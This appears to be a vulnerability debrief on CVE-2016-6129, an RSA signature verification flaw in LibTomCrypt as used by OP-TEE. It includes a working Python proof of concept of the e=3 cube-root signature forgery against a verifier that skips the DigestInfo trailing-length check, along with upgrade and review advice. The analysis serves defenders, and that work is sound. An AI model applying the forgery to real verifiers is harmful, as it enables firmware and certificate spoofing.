PatchSiren cyber security CVE debrief
CVE-2016-6129 Libtom CVE debrief
CVE-2016-6129 is a high-severity RSA signature verification flaw in LibTomCrypt’s rsa_verify_hash_ex function, used by OP-TEE before 2.2.0. The issue stems from missing validation that the message length matches the ASN.1 encoded data length, which can make RSA signature or certificate forgery easier for a remote attacker. NVD classifies the weakness as CWE-20 and rates it CVSS 3.0 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N).
- Vendor: Libtom
- Product: LibTomCrypt (rsa_verify_hash_ex), as used in OP-TEE before 2.2.0
- CVE: CVE-2016-6129
- CVSS: HIGH 7.5 (v3.0, AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)
- CISA KEV: Not listed in stored evidence
- Original CVE published: 2017-02-13
- Original CVE updated: 2026-05-13
- Advisory published: 2017-02-13
- Advisory updated: 2026-05-13
Who should care
Organizations using OP-TEE, LibTomCrypt, or downstream products that depend on their RSA signature verification or certificate validation paths should prioritize this issue. Security teams should especially review embedded, trusted-execution, and authentication workflows that rely on these libraries for integrity decisions.
Technical summary
According to the supplied NVD description, the flaw is in rsa_verify_hash_ex in rsa_verify_hash.c. After the PKCS#1 v1.5 padding (00 01 FF..FF 00) is stripped from the recovered message, the function parses the ASN.1 DigestInfo but does not validate that the message length equals the ASN.1 encoded data length, so any bytes that follow the DigestInfo are never examined. That unchecked tail is exactly what a Bleichenbacher-style low-exponent forgery needs: against a key with a small public exponent such as e=3, an attacker can pick a signature value whose cube, computed as a plain integer with no private-key operation, reproduces the expected padding and DigestInfo in its leading bytes and pushes the arithmetic error into the ignored trailing bytes. The supplied NVD record maps the weakness to CWE-20 and lists affected ranges up to OP-TEE OS 2.1.0 and LibTomCrypt 1.17.
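To make the flaw class concrete, the following is an added Python example, not LibTomCrypt or OP-TEE code and not the actual upstream patch. It implements RSASSA-PKCS1-v1_5 verification for SHA-256 twice: once with the DigestInfo length check (bytes after the DigestInfo must not exist) and once without it, which models the behaviour the NVD description attributes to rsa_verify_hash_ex. It then runs the classic e=3 cube-root forgery against the lenient path. Everything here is assumed for illustration: the function names (check_em, verify, forge), the sample message, and the modulus, which is a constructed 2048-bit odd integer standing in for a public key (the forgery only needs n and e=3 and never wraps modulo n, so a real public modulus behaves the same way). The same harness doubles as a regression check: a patched verifier must return False for the forged signature.

```python
"""Added example (not LibTomCrypt/OP-TEE code): PKCS#1 v1.5 verification with and without
the DigestInfo trailing-length check, plus the e=3 cube-root forgery against the lenient path."""
import hashlib
import random

# DER DigestInfo prefix for SHA-256 (RFC 8017, section 9.2, note 1); bytes 2..16 are the AlgorithmIdentifier.
SHA256_DIGESTINFO_PREFIX = bytes.fromhex("3031300d060960864801650304020105000420")
ALG_ID_SHA256 = SHA256_DIGESTINFO_PREFIX[2:17]

def emsa_encode(msg, k):
    """EMSA-PKCS1-v1_5 encoding: 00 01 FF..FF 00 DigestInfo, exactly k bytes long."""
    t = SHA256_DIGESTINFO_PREFIX + hashlib.sha256(msg).digest()
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t

def _strip_padding(em):
    """Undo the 00 01 FF..FF 00 framing (at least 8 bytes of FF); returns T or None."""
    sep = em.find(b"\x00", 2)
    if em[:2] != b"\x00\x01" or sep < 10 or any(b != 0xFF for b in em[2:sep]):
        return None
    return em[sep + 1:]

def _der_tlv(buf, pos):
    """Parse one short-form DER TLV at buf[pos]; returns (tag, value_start, value_end)."""
    tag, length = buf[pos], buf[pos + 1]
    if length & 0x80:  # long-form lengths never occur inside a DigestInfo; treat as malformed
        raise ValueError("unexpected long-form length")
    return tag, pos + 2, pos + 2 + length

def _parse_digestinfo(t):
    """DigestInfo ::= SEQUENCE { AlgorithmIdentifier, OCTET STRING }; returns (alg_id, digest, consumed) or None."""
    try:
        tag, start, end = _der_tlv(t, 0)
        atag, _, aend = _der_tlv(t, start)
        otag, ostart, oend = _der_tlv(t, aend)
    except (IndexError, ValueError):
        return None
    if tag != 0x30 or atag != 0x30 or otag != 0x04 or oend != end:
        return None
    return t[start:aend], t[ostart:oend], end

def check_em(em, msg, check_trailing=True):
    """Validate a recovered encoded message against msg. check_trailing=False models the
    flawed path described for CVE-2016-6129: bytes after the DigestInfo are never examined."""
    t = _strip_padding(em)
    parsed = _parse_digestinfo(t) if t is not None else None
    if parsed is None:
        return False
    alg_id, digest, consumed = parsed
    if check_trailing and consumed != len(t):  # the length check the CVE describes as missing
        return False
    return alg_id == ALG_ID_SHA256 and digest == hashlib.sha256(msg).digest()

def verify(sig, msg, n, e, check_trailing=True):
    """RSASSA-PKCS1-v1_5 verify: EM = sig^e mod n, then structural check of EM."""
    k = (n.bit_length() + 7) // 8
    if len(sig) != k:
        return False
    em = pow(int.from_bytes(sig, "big"), e, n).to_bytes(k, "big")
    return check_em(em, msg, check_trailing)

def _icbrt_ceil(x):
    """Smallest integer s with s**3 >= x (integer Newton iteration started above the root)."""
    r = 1 << ((x.bit_length() + 2) // 3)
    s = r + 1
    while r < s:
        s, r = r, (2 * r + x // (r * r)) // 3
    return s if s ** 3 >= x else s + 1

def forge(msg, n, e=3):
    """Attacker knows only (n, e=3): lay out 00 01 FF*8 00 DigestInfo 00..00, take the cube root
    rounded up. Cubing it reproduces every byte through the DigestInfo; the rounding error (below
    about 2/3 of the modulus length) lands only in the trailing zeros a lenient verifier ignores."""
    assert e == 3, "the cube-root trick needs a small public exponent"
    k = (n.bit_length() + 7) // 8
    head = b"\x00\x01" + b"\xff" * 8 + b"\x00" + SHA256_DIGESTINFO_PREFIX + hashlib.sha256(msg).digest()
    target = int.from_bytes(head + b"\x00" * (k - len(head)), "big")
    return _icbrt_ceil(target).to_bytes(k, "big")

def demo(modulus_bits=2048):
    """Constructed stand-in modulus: any odd 2048-bit integer works because the forged s has
    s**3 < n and never wraps; no private key is involved anywhere in the forgery."""
    random.seed(2016)
    n = random.getrandbits(modulus_bits) | (1 << (modulus_bits - 1)) | 1
    msg = b"constructed sample: firmware image v1.0"  # constructed input
    k = modulus_bits // 8
    forged = forge(msg, n, 3)
    return {
        "genuine_em_strict": check_em(emsa_encode(msg, k), msg, True),
        "genuine_em_lenient": check_em(emsa_encode(msg, k), msg, False),
        "forged_lenient": verify(forged, msg, n, 3, check_trailing=False),
        "forged_strict": verify(forged, msg, n, 3, check_trailing=True),
        "forged_other_msg_lenient": verify(forged, b"some other message", n, 3, check_trailing=False),
    }

if __name__ == "__main__":
    print(demo())
```

The lenient verifier accepts the forged signature because it parses a correct DigestInfo and stops; the strict one sees 194 unparsed bytes after it and rejects. Note that the forgery is only practical for small public exponents, which is why e=65537 blunts it, but the correct fix is the trailing-length check (or an exact comparison of the whole encoded message), not reliance on the exponent.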
Defensive priority
High. The impact is integrity-only but direct: successful exploitation can undermine trust decisions made by signature verification or certificate validation, which in a trusted-execution context typically gates firmware or trusted-application loading. Because the attack is network-reachable and requires no privileges or user interaction in the supplied CVSS vector, affected deployments should be treated as urgent upgrade candidates. The forgery itself is only practical against keys with a small public exponent such as e=3, but the defect is in the verifier, so the exponent is not a substitute for the fix.
Recommended defensive actions
- Upgrade OP-TEE to 2.2.0 or later if it is in use.
- Upgrade LibTomCrypt beyond version 1.17 if it is used directly or through a downstream product.
- Review any RSA-based verification or certificate validation code paths that depend on these libraries, and confirm that the verifier rejects a recovered message whose DigestInfo is followed by extra bytes (or compares the full encoded message rather than only the parsed fields).
- Confirm whether embedded or trusted-execution deployments vendor-patch this issue rather than relying on upstream version numbers alone; inspect the shipped rsa_verify_hash.c where possible.
- Inventory signing keys with small public exponents (e=3) that are verified by these code paths; they are the keys the described forgery applies to.
- Use the linked vendor and patch references to verify fixed builds and rollout guidance.
Evidence notes
The supplied corpus identifies the issue in the NVD record for CVE-2016-6129 and cites the original description, affected CPE criteria, CVSS vector, and CWE-20 mapping. References include a Red Hat Bugzilla issue, a LibTomCrypt commit labeled as a patch/third-party advisory, and the OP-TEE advisories page. Published date in the supplied record is 2017-02-13T18:59:00.660Z; modified date is 2026-05-13T00:24:29.033Z.
Official resources
- CVE-2016-6129 CVE record (CVE.org)
- CVE-2016-6129 NVD detail (NVD)
- Mitigation or vendor reference (Issue Tracking, Patch): the Red Hat Bugzilla issue cited in the evidence notes
- Mitigation or vendor reference (Issue Tracking, Patch, Third Party Advisory): the LibTomCrypt fix commit cited in the evidence notes
- Mitigation or vendor reference (Vendor Advisory): the OP-TEE advisories page cited in the evidence notes
The supplied official record shows CVE publication on 2017-02-13T18:59:00.660Z and a later modification on 2026-05-13T00:24:29.033Z. No separate vendor disclosure date is included in the supplied corpus.